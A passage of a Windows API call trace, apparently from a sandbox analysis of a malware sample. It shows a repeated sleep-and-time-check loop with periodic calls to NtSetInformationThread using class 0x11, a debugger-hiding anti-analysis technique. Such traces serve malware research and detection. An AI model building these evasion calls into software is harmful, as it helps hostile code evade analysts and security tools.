GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x14, wMilliseconds=0xcf)) [0062.776] GetTickCount () returned 0x11513a4 [0062.776] Sleep (dwMilliseconds=0x3e8) [0063.902] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x15, wMilliseconds=0x14c)) [0063.902] GetTickCount () returned 0x1151809 [0063.902] Sleep (dwMilliseconds=0x3e8) [0064.929] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x16, wMilliseconds=0x15c)) [0064.929] GetTickCount () returned 0x1151c00 [0064.929] Sleep (dwMilliseconds=0x3e8) [0066.225] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x17, wMilliseconds=0x284)) [0066.226] GetTickCount () returned 0x1152111 [0066.226] Sleep (dwMilliseconds=0x3e8) [0067.506] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x18, wMilliseconds=0x3a0)) [0067.506] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0067.506] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0067.506] GetCurrentThread () returned 0xfffffffe [0067.506] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0067.506] GetTickCount () returned 0x1152612 [0067.506] Sleep (dwMilliseconds=0x3e8) [0068.535] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x19, wMilliseconds=0x3bd)) [0068.535] GetTickCount () returned 0x1152a1a [0068.535] Sleep (dwMilliseconds=0x3e8) [0069.992] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x1b, wMilliseconds=0x1a9)) [0069.993] GetTickCount () returned 0x1152fd6 [0069.993] Sleep (dwMilliseconds=0x3e8) [0071.507] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x1c, wMilliseconds=0x3a3)) [0071.507] GetTickCount () returned 0x11535b2 [0071.507] Sleep (dwMilliseconds=0x3e8) [0072.678] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x1e, wMilliseconds=0x6d)) [0072.678] GetTickCount () returned 0x1153a56 [0072.678] Sleep (dwMilliseconds=0x3e8) [0073.716] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x1f, wMilliseconds=0x8d)) [0073.716] GetTickCount () returned 0x1153e5d [0073.716] Sleep (dwMilliseconds=0x3e8) [0074.750] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x20, wMilliseconds=0xac)) [0074.750] GetTickCount () returned 0x1154264 [0074.750] Sleep (dwMilliseconds=0x3e8) [0075.769] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x21, wMilliseconds=0xc8)) [0075.769] GetTickCount () returned 0x115466c [0075.769] Sleep (dwMilliseconds=0x3e8) [0076.801] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x22, wMilliseconds=0xe7)) [0076.801] GetTickCount () returned 0x1154a73 [0076.801] Sleep (dwMilliseconds=0x3e8) [0077.864] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x23, wMilliseconds=0x126)) [0077.864] GetTickCount () returned 0x1154e99 [0077.864] Sleep (dwMilliseconds=0x3e8) [0078.909] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x24, wMilliseconds=0x155)) [0078.910] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0078.910] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0078.910] GetCurrentThread () returned 0xfffffffe [0078.911] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0078.911] GetTickCount () returned 0x11552b0 [0078.911] Sleep (dwMilliseconds=0x3e8) [0080.185] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x25, wMilliseconds=0x26a)) [0080.185] GetTickCount () returned 0x11557a2 [0080.186] Sleep (dwMilliseconds=0x3e8) [0081.264] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x26, wMilliseconds=0x2af)) [0081.264] GetTickCount () returned 0x1155bd8 [0081.264] Sleep (dwMilliseconds=0x3e8) [0082.567] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x27, wMilliseconds=0x3e7)) [0082.567] GetTickCount () returned 0x11560f8 [0082.567] Sleep (dwMilliseconds=0x3e8) [0083.887] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x29, wMilliseconds=0x138)) [0083.887] GetTickCount () returned 0x1156619 [0083.887] Sleep (dwMilliseconds=0x3e8) [0085.023] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x2a, wMilliseconds=0x1c4)) [0085.023] GetTickCount () returned 0x1156a8e [0085.023] Sleep (dwMilliseconds=0x3e8) [0086.304] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x2b, wMilliseconds=0x2df)) [0086.304] GetTickCount () returned 0x1156f8f [0086.304] Sleep (dwMilliseconds=0x3e8) [0087.602] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x2d, wMilliseconds=0x20)) [0087.602] GetTickCount () returned 0x11574a0 [0087.602] Sleep (dwMilliseconds=0x3e8) [0089.138] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x2e, wMilliseconds=0x234)) [0089.139] GetTickCount () returned 0x1157a9b [0089.139] Sleep (dwMilliseconds=0x3e8) [0090.327] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x2f, wMilliseconds=0x2e9)) [0090.327] GetTickCount () returned 0x1157f3e [0090.327] Sleep (dwMilliseconds=0x3e8) [0092.973] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x32, wMilliseconds=0x191)) [0092.973] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0092.974] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0092.974] GetCurrentThread () returned 0xfffffffe [0092.974] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0092.974] GetTickCount () returned 0x115899f [0092.974] Sleep (dwMilliseconds=0x3e8) [0094.047] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x33, wMilliseconds=0x1d7)) [0094.047] GetTickCount () returned 0x1158dc5 [0094.047] Sleep (dwMilliseconds=0x3e8) [0095.062] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x34, wMilliseconds=0x1e6)) [0095.062] GetTickCount () returned 0x11591bd [0095.062] Sleep (dwMilliseconds=0x3e8) [0096.317] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x35, wMilliseconds=0x2e2)) [0096.317] GetTickCount () returned 0x115969f [0096.317] Sleep (dwMilliseconds=0x3e8) [0098.276] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x37, wMilliseconds=0x2c2)) [0098.276] GetTickCount () returned 0x1159e50 [0098.276] Sleep (dwMilliseconds=0x3e8) [0099.297] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x38, wMilliseconds=0x2d2)) [0099.297] GetTickCount () returned 0x115a247 [0099.297] Sleep (dwMilliseconds=0x3e8) [0100.333] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x39, wMilliseconds=0x2fe)) [0100.333] GetTickCount () returned 0x115a65e [0100.334] Sleep (dwMilliseconds=0x3e8) [0101.397] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x3a, wMilliseconds=0x32f)) [0101.397] GetTickCount () returned 0x115aa75 [0101.397] Sleep (dwMilliseconds=0x3e8) [0102.462] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x28, wSecond=0x3b, wMilliseconds=0x37d)) [0102.462] GetTickCount () returned 0x115aeab [0102.462] Sleep (dwMilliseconds=0x3e8) [0103.535] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x3bc)) [0103.535] GetTickCount () returned 0x115b2d2 [0103.535] Sleep (dwMilliseconds=0x3e8) [0104.592] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x2, wMilliseconds=0x16)) [0104.593] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0104.593] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0104.594] GetCurrentThread () returned 0xfffffffe [0104.594] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0104.594] GetTickCount () returned 0x115b6f8 [0104.594] Sleep (dwMilliseconds=0x3e8) [0105.630] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x3, wMilliseconds=0x3b)) [0105.630] GetTickCount () returned 0x115bb0f [0105.630] Sleep (dwMilliseconds=0x3e8) [0106.689] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x4, wMilliseconds=0x79)) [0106.689] GetTickCount () returned 0x115bf35 [0106.689] Sleep (dwMilliseconds=0x3e8) [0108.211] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x5, wMilliseconds=0x27d)) [0108.211] GetTickCount () returned 0x115c540 [0108.240] Sleep (dwMilliseconds=0x3e8) [0109.469] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x6, wMilliseconds=0x377)) [0109.469] GetTickCount () returned 0x115ca03 [0109.469] Sleep (dwMilliseconds=0x3e8) [0110.900] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x8, wMilliseconds=0x147)) [0110.900] GetTickCount () returned 0x115cfa1 [0110.900] Sleep (dwMilliseconds=0x3e8) [0112.119] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x9, wMilliseconds=0x225)) [0112.119] GetTickCount () returned 0x115d463 [0112.119] Sleep (dwMilliseconds=0x3e8) [0113.393] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0xa, wMilliseconds=0x32f)) [0113.394] GetTickCount () returned 0x115d955 [0113.394] Sleep (dwMilliseconds=0x3e8) [0114.794] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0xc, wMilliseconds=0xdd)) [0114.794] GetTickCount () returned 0x115ded3 [0114.794] Sleep (dwMilliseconds=0x3e8) [0116.011] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0xd, wMilliseconds=0x1b5)) [0116.011] GetTickCount () returned 0x115e396 [0116.011] Sleep (dwMilliseconds=0x3e8) [0117.225] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0xe, wMilliseconds=0x290)) [0117.225] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0117.226] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0117.226] GetCurrentThread () returned 0xfffffffe [0117.226] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0117.226] GetTickCount () returned 0x115e859 [0117.226] Sleep (dwMilliseconds=0x3e8) [0118.739] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x10, wMilliseconds=0xac)) [0118.739] GetTickCount () returned 0x115ee44 [0118.739] Sleep (dwMilliseconds=0x3e8) [0120.005] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x11, wMilliseconds=0x1b5)) [0120.005] GetTickCount () returned 0x115f336 [0120.005] Sleep (dwMilliseconds=0x3e8) [0121.093] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x12, wMilliseconds=0x20d)) [0121.093] GetTickCount () returned 0x115f76c [0121.093] Sleep (dwMilliseconds=0x3e8) [0122.181] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x13, wMilliseconds=0x264)) [0122.181] GetTickCount () returned 0x115fbb2 [0122.181] Sleep (dwMilliseconds=0x3e8) [0123.258] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x14, wMilliseconds=0x2b2)) [0123.258] GetTickCount () returned 0x115ffe8 [0123.258] Sleep (dwMilliseconds=0x3e8) [0124.476] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x15, wMilliseconds=0x38d)) [0124.476] GetTickCount () returned 0x11604ab [0124.476] Sleep (dwMilliseconds=0x3e8) [0125.550] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x16, wMilliseconds=0x3d5)) [0125.550] GetTickCount () returned 0x11608e1 [0125.550] Sleep (dwMilliseconds=0x3e8) [0126.993] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x18, wMilliseconds=0x1a2)) [0126.993] GetTickCount () returned 0x1160e7e [0126.993] Sleep (dwMilliseconds=0x3e8) [0128.489] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x19, wMilliseconds=0x396)) [0128.489] GetTickCount () returned 0x116145a [0128.489] Sleep (dwMilliseconds=0x3e8) [0129.638] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1b, wMilliseconds=0x3b)) [0129.638] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0129.639] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0129.639] GetCurrentThread () returned 0xfffffffe [0129.639] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0129.639] GetTickCount () returned 0x11618cf [0129.639] Sleep (dwMilliseconds=0x3e8) [0130.923] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1c, wMilliseconds=0x160)) [0130.924] GetTickCount () returned 0x1161dd0 [0130.924] Sleep (dwMilliseconds=0x3e8) [0132.053] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1d, wMilliseconds=0x1e4)) [0132.054] GetTickCount () returned 0x1162245 [0132.054] Sleep (dwMilliseconds=0x3e8) [0133.895] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1f, wMilliseconds=0x148)) [0133.895] GetTickCount () returned 0x1162979 [0133.895] Sleep (dwMilliseconds=0x3e8) [0135.068] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x20, wMilliseconds=0x1f4)) [0135.068] GetTickCount () returned 0x1162e0c [0135.069] Sleep (dwMilliseconds=0x3e8) [0137.109] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x22, wMilliseconds=0x213)) [0137.109] GetTickCount () returned 0x11635fc [0137.109] Sleep (dwMilliseconds=0x3e8) [0138.294] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x23, wMilliseconds=0x2ce)) [0138.294] GetTickCount () returned 0x1163a9f [0138.294] Sleep (dwMilliseconds=0x3e8) [0139.368] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x24, wMilliseconds=0x31d)) [0139.368] GetTickCount () returned 0x1163ed5 [0139.368] Sleep (dwMilliseconds=0x3e8) [0140.421] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x25, wMilliseconds=0x356)) [0140.421] GetTickCount () returned 0x11642fc [0140.433] Sleep (dwMilliseconds=0x3e8) [0141.502] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x26, wMilliseconds=0x3a5)) [0141.502] GetTickCount () returned 0x1164732 [0141.502] Sleep (dwMilliseconds=0x3e8) [0142.522] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x27, wMilliseconds=0x3b9)) [0142.526] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0142.527] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0142.528] GetCurrentThread () returned 0xfffffffe [0142.528] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0142.530] GetTickCount () returned 0x1164b2a [0142.530] Sleep (dwMilliseconds=0x3e8) [0143.708] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x29, wMilliseconds=0x8c)) [0143.708] GetTickCount () returned 0x1164fcd [0143.708] Sleep (dwMilliseconds=0x3e8) [0144.931] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x2a, wMilliseconds=0x16b)) [0144.931] GetTickCount () returned 0x1165490 [0144.931] Sleep (dwMilliseconds=0x3e8) [0146.073] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x2b, wMilliseconds=0x1f1)) [0146.073] GetTickCount () returned 0x1165904 [0146.073] Sleep (dwMilliseconds=0x3e8) [0147.130] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x2c, wMilliseconds=0x22f)) [0147.130] GetTickCount () returned 0x1165d2b [0147.130] Sleep (dwMilliseconds=0x3e8) [0148.564] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x2d, wMilliseconds=0x3e5)) [0148.564] GetTickCount () returned 0x11662c8 [0148.564] Sleep (dwMilliseconds=0x3e8) [0149.695] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x2f, wMilliseconds=0x7a)) [0149.695] GetTickCount () returned 0x116672d [0149.695] Sleep (dwMilliseconds=0x3e8) [0150.737] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x30, wMilliseconds=0xa7)) [0150.737] GetTickCount () returned 0x1166b44 [0150.737] Sleep (dwMilliseconds=0x3e8) [0151.847] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x31, wMilliseconds=0x10f)) [0151.848] GetTickCount () returned 0x1166f8a [0151.848] Sleep (dwMilliseconds=0x3e8) [0152.948] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x32, wMilliseconds=0x17c)) [0152.948] GetTickCount () returned 0x11673df [0152.948] Sleep (dwMilliseconds=0x3e8) [0153.974] GetLocalTime (in: lpSystemTime=0x335fe24 | out: lpSystemTime=0x335fe24*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x33, wMilliseconds=0x18c)) [0153.975] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0153.975] GetProcAddress (hModule=0x77970000, lpProcName="NtSetInformationThread") returned 0x779e1dc0 [0153.975] GetCurrentThread () returned 0xfffffffe [0153.975] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0153.975] GetTickCount () returned 0x11677d7 [0153.975] Sleep (dwMilliseconds=0x3e8) [0155.105] GetLocalTime 